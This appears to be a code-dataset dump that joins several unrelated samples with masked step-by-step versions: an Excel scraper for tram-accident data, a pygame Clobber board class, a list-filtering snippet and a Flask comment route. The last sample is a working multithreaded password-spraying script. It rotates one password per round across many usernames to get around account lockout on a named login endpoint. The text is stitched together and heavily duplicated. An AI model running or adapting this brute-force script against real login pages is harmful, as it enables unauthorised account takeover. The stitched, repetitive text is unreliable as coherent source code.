xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
if cell.ctype == xlrd.XL_CELL_DATE:
datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
if datetuple[3:] == (0, 0, 0):
return datetime.date(datetuple[0], datetuple[1], datetuple[2])
return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])
if cell.ctype == xlrd.XL_CELL_EMPTY: return None
if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
for rownumber in range(4, sheet.nrows):
values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
data = dict(zip(keys, values))
data['rownumber'] = rownumber
del data['']
if data['DATE'] != None and data['FLEET NO'] != None:
scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
|
normal
|
{
"blob_id": "86ec33393bb19ee432c30834ea7983b11f4d1234",
"index": 5169,
"step-1": "import scraperwiki\nimport xlrd\nxlbin = scraperwiki.scrape(\"http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls\")\nbook = xlrd.open_workbook(file_contents=xlbin)\n\nsheet = book.sheet_by_index(0)\n\nfor n, s in enumerate(book.sheets()):\n print \"Sheet %d is called %s and has %d columns and %d rows\" % (n, s.name, s.ncols, s.nrows)\n\nprint sheet.row_values(4)\n\n\nimport datetime\ndef cellval(cell, datemode):\n if cell.ctype == xlrd.XL_CELL_DATE:\n datetuple = xlrd.xldate_as_tuple(cell.value, datemode)\n if datetuple[3:] == (0, 0, 0):\n return datetime.date(datetuple[0], datetuple[1], datetuple[2])\n return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])\n if cell.ctype == xlrd.XL_CELL_EMPTY: return None\n if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1\n return cell.value\n\nprint [ cellval(c, book.datemode) for c in sheet.row(4) ]\n\nkeys = sheet.row_values(2)\nkeys[1] = keys[1].replace('.', '')\nprint keys\n\nfor rownumber in range(4, sheet.nrows):\n values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]\n data = dict(zip(keys, values))\n data['rownumber'] = rownumber\n del data['']\n if data['DATE'] != None and data['FLEET NO'] != None:\n scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)\nimport scraperwiki\nimport xlrd\nxlbin = scraperwiki.scrape(\"http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls\")\nbook = xlrd.open_workbook(file_contents=xlbin)\n\nsheet = book.sheet_by_index(0)\n\nfor n, s in enumerate(book.sheets()):\n print \"Sheet %d is called %s and has %d columns and %d rows\" % (n, s.name, s.ncols, s.nrows)\n\nprint sheet.row_values(4)\n\n\nimport datetime\ndef cellval(cell, datemode):\n if cell.ctype == xlrd.XL_CELL_DATE:\n datetuple = xlrd.xldate_as_tuple(cell.value, datemode)\n if datetuple[3:] == (0, 0, 0):\n return datetime.date(datetuple[0], datetuple[1], datetuple[2])\n return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])\n if cell.ctype == xlrd.XL_CELL_EMPTY: return None\n if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1\n return cell.value\n\nprint [ cellval(c, book.datemode) for c in sheet.row(4) ]\n\nkeys = sheet.row_values(2)\nkeys[1] = keys[1].replace('.', '')\nprint keys\n\nfor rownumber in range(4, sheet.nrows):\n values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]\n data = dict(zip(keys, values))\n data['rownumber'] = rownumber\n del data['']\n if data['DATE'] != None and data['FLEET NO'] != None:\n scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pygame
from clobber.constants import GREY, ROWS, WHITE, SQUARE_SIZE, COLS, YELLOW, BLACK
from clobber.piece import Piece
class Board:
def __init__(self):
self.board = []
self.selected_piece = None
self.create_board()
def draw_squares(self, win):
win.fill(GREY)
for row in range(ROWS):
for col in range(row % 2, COLS, 2):
pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col * SQUARE_SIZE,
SQUARE_SIZE, SQUARE_SIZE))
def create_board(self):
for row in range(ROWS):
self.board.append([])
for col in range(COLS):
if col % 2 == ((row + 1) % 2):
self.board[row].append(Piece(row, col, YELLOW))
else:
self.board[row].append(Piece(row, col, BLACK))
def draw(self, win):
self.draw_squares(win)
for row in range(ROWS):
for col in range(COLS):
piece = self.board[row][col]
if piece != 0:
piece.draw(win)
def move(self, piece, row, col):
self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[piece.row][piece.col]
piece.move(row, col)
def get_piece(self, row, col):
return self.board[row][col]
def get_valid_moves(self, piece):
moves = []
# left
if piece.col != 0:
watch_p = self.board[piece.row][piece.col - 1]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
# top
if piece.row != 0:
watch_p = self.board[piece.row - 1][piece.col]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
# right
if piece.col != len(self.board[piece.row]) - 1:
watch_p = self.board[piece.row][piece.col + 1]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
# down
if piece.row != len(self.board) - 1:
watch_p = self.board[piece.row + 1][piece.col]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
return moves
def evaluate(self):
amount_of_yellow = 0
amount_of_black = 0
for row in self.board:
for piece in row:
if piece == 0:
continue
if piece.color == YELLOW:
if not self.is_dead(piece):
amount_of_yellow += 1
else:
if not self.is_dead(piece):
amount_of_black += 1
return amount_of_yellow - amount_of_black
def is_dead(self, piece):
# left
if piece.col != 0:
watch_p = self.board[piece.row][piece.col - 1]
if watch_p != 0:
return False
# top
if piece.row != 0:
watch_p = self.board[piece.row - 1][piece.col]
if watch_p != 0:
return False
# right
if piece.col != len(self.board[piece.row]) - 1:
watch_p = self.board[piece.row][piece.col + 1]
if watch_p != 0:
return False
# down
if piece.row != len(self.board) - 1:
watch_p = self.board[piece.row + 1][piece.col]
if watch_p != 0:
return False
return True
def get_all_pieces(self, color):
pieces = []
for row in self.board:
for piece in row:
if piece != 0 and piece.color == color:
pieces.append(piece)
return pieces
def winner(self):
for row in self.board:
for piece in row:
if piece != 0:
if len(self.get_valid_moves(piece)) != 0:
return None
return BLACK
|
normal
|
{
"blob_id": "b80b997f802c7ed4f0a838030703a314f2383c9d",
"index": 5226,
"step-1": "<mask token>\n\n\nclass Board:\n <mask token>\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n <mask token>\n <mask token>\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n <mask token>\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-2": "<mask token>\n\n\nclass Board:\n <mask token>\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n <mask token>\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n <mask token>\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-3": "<mask token>\n\n\nclass Board:\n <mask token>\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n\n def move(self, piece, row, col):\n self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[\n piece.row][piece.col]\n piece.move(row, col)\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n\n def is_dead(self, piece):\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0:\n return False\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0:\n return False\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0:\n return False\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0:\n return False\n return True\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-4": "import pygame\nfrom clobber.constants import GREY, ROWS, WHITE, SQUARE_SIZE, COLS, YELLOW, BLACK\nfrom clobber.piece import Piece\n\n\nclass Board:\n\n def __init__(self):\n self.board = []\n self.selected_piece = None\n self.create_board()\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n\n def move(self, piece, row, col):\n self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[\n piece.row][piece.col]\n piece.move(row, col)\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n\n def is_dead(self, piece):\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0:\n return False\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0:\n return False\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0:\n return False\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0:\n return False\n return True\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-5": "import pygame\n\nfrom clobber.constants import GREY, ROWS, WHITE, SQUARE_SIZE, COLS, YELLOW, BLACK\nfrom clobber.piece import Piece\n\n\nclass Board:\n def __init__(self):\n self.board = []\n self.selected_piece = None\n self.create_board()\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col * SQUARE_SIZE,\n SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == ((row + 1) % 2):\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n\n def move(self, piece, row, col):\n self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[piece.row][piece.col]\n piece.move(row, col)\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n\n # left\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n # top\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n # right\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n # down\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n else:\n if not self.is_dead(piece):\n amount_of_black += 1\n\n return amount_of_yellow - amount_of_black\n\n def is_dead(self, piece):\n # left\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0:\n return False\n\n # top\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0:\n return False\n\n # right\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0:\n return False\n\n # down\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0:\n return False\n\n return True\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n\n return BLACK\n",
"step-ids": [
8,
9,
11,
13,
14
]
}
|
[
8,
9,
11,
13,
14
] |
my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]
new_list = list(filter(lambda x: x != 0, my_list))
try:
new = list(map(lambda x: 2 / x, new_list))
except ZeroDivisionError:
pass
print(new)
# def devis(n, list):
# new_list = []
# for i, m_list in enumerate(list):
# try:
# new_list.append(n/m_list)
# except ZeroDivisionError:
# new_list.append(None)
# return new_list
# print(devis(2, my_list))
|
normal
|
{
"blob_id": "46f3d3681343d96889ddb073f17ff7f225486f35",
"index": 8005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n new = list(map(lambda x: 2 / x, new_list))\nexcept ZeroDivisionError:\n pass\nprint(new)\n",
"step-3": "my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]\nnew_list = list(filter(lambda x: x != 0, my_list))\ntry:\n new = list(map(lambda x: 2 / x, new_list))\nexcept ZeroDivisionError:\n pass\nprint(new)\n",
"step-4": "my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]\nnew_list = list(filter(lambda x: x != 0, my_list))\n\ntry:\n new = list(map(lambda x: 2 / x, new_list))\nexcept ZeroDivisionError:\n pass\n\nprint(new)\n\n\n\n\n\n# def devis(n, list):\n# new_list = []\n# for i, m_list in enumerate(list):\n# try:\n# new_list.append(n/m_list)\n# except ZeroDivisionError:\n# new_list.append(None)\n# return new_list\n# print(devis(2, my_list))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/comments/new/')
@login_required(role='ANY')
def comments_form():
return render_template('comments/new.html', form=CommentForm())
<|reserved_special_token_1|>
from flask import render_template, request, redirect, url_for
from flask_login import current_user
from application import app, db, login_required
from application.auth.models import User
from application.memes.models import Meme
from application.comments.forms import CommentForm
@app.route('/comments/new/')
@login_required(role='ANY')
def comments_form():
return render_template('comments/new.html', form=CommentForm())
<|reserved_special_token_1|>
from flask import render_template, request, redirect, url_for
from flask_login import current_user
from application import app, db, login_required
from application.auth.models import User
from application.memes.models import Meme
from application.comments.forms import CommentForm
# only a dummy new comment form
@app.route("/comments/new/")
@login_required(role="ANY")
def comments_form():
return render_template("comments/new.html", form = CommentForm())
|
flexible
|
{
"blob_id": "fe1d47b63e88935f8b2eb4bac883f3028d6f560b",
"index": 4515,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/comments/new/')\n@login_required(role='ANY')\ndef comments_form():\n return render_template('comments/new.html', form=CommentForm())\n",
"step-3": "from flask import render_template, request, redirect, url_for\nfrom flask_login import current_user\nfrom application import app, db, login_required\nfrom application.auth.models import User\nfrom application.memes.models import Meme\nfrom application.comments.forms import CommentForm\n\n\n@app.route('/comments/new/')\n@login_required(role='ANY')\ndef comments_form():\n return render_template('comments/new.html', form=CommentForm())\n",
"step-4": "from flask import render_template, request, redirect, url_for\nfrom flask_login import current_user\n\nfrom application import app, db, login_required\nfrom application.auth.models import User\nfrom application.memes.models import Meme\nfrom application.comments.forms import CommentForm\n\n# only a dummy new comment form\n\n@app.route(\"/comments/new/\")\n@login_required(role=\"ANY\")\ndef comments_form():\n return render_template(\"comments/new.html\", form = CommentForm())",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
if __name__ == '__main__':
args = get_parse()
dict_username = args.get('dict_username', 'username.txt')
dict_password = args.get('dict_password', 'password.txt')
for curr_round in range(0, MAX_ROUND):
print('[INFO] 开始第{0}轮爆破'.format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print('[INFO] Sleep.')
sleep(2)
print_result()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
MAX_ROUND = 3
curr_round = 0
sleep_time = 2
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
if __name__ == '__main__':
args = get_parse()
dict_username = args.get('dict_username', 'username.txt')
dict_password = args.get('dict_password', 'password.txt')
for curr_round in range(0, MAX_ROUND):
print('[INFO] 开始第{0}轮爆破'.format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print('[INFO] Sleep.')
sleep(2)
print_result()
<|reserved_special_token_1|>
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3
curr_round = 0
sleep_time = 2
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
if __name__ == '__main__':
args = get_parse()
dict_username = args.get('dict_username', 'username.txt')
dict_password = args.get('dict_password', 'password.txt')
for curr_round in range(0, MAX_ROUND):
print('[INFO] 开始第{0}轮爆破'.format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print('[INFO] Sleep.')
sleep(2)
print_result()
